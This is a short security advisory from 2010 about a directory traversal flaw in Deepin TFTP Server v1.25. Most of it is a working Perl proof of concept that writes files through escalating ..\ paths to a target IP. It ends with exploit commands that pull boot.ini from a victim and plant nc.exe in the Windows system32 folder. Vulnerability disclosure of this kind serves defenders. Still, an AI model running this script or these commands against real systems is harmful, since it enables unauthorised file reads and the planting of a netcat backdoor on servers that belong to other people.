Software : Deepin TFTP Server Directory Traversal Vulnerability Software Version : v1.25 Vendor: Deepin.org Vulnerability Published : 2010-08-14 Vulnerability Update Time : Status : Impact : Medium Bug Description : Deepin TFTP Server does not properly sanitise filenames containing directory traversal sequences that are received from an FTP client. Proof Of Concept : **************************************************************** #!/usr/bin/perl -w $|=1; $target_ip=shift || die "usage: $0 \$target_ip\n"; @directory_traversal=( '..\tmp.txt', '..\..\tmp.txt', '..\..\..\tmp.txt', '..\..\..\..\tmp.txt', '..\..\..\..\..\tmp.txt', '..\..\..\..\..\..\tmp.txt', '..\..\..\..\..\..\..\tmp.txt' ); open(TMP, ">tmp.txt"); print TMP "tmp"; close(TMP); foreach $dt_content (@directory_traversal){ $dt_it=`tftp.exe $target_ip put tmp.txt $dt_content`; print "command : tftp.exe $target_ip put tmp.txt $dt_content\n"; print "$dt_it"; if($dt_it=~m/^Transferred successfully/){ print "Directory Traversal PAYLOAD is $dt_content.\n"; print "Press [ENTER] Button to continue...\n"; ; } sleep(3); } print "Finish!\n"; exit(0); **************************************************************** Exploit : **************************************************************** #get sensitive file c:\windows\system32>tftp [VICTIM_IP] get ../../boot.ini boot.ini #put malware c:\windows\system32>tftp [VICTIM_IP] put nc.exe ../../WINDOWS/system32/nc.exe **************************************************************** Credits : This vulnerability was discovered by demonalex(at)163(dot)com Pentester/Researcher Dark2S Security Team/Venustech.GZ Branch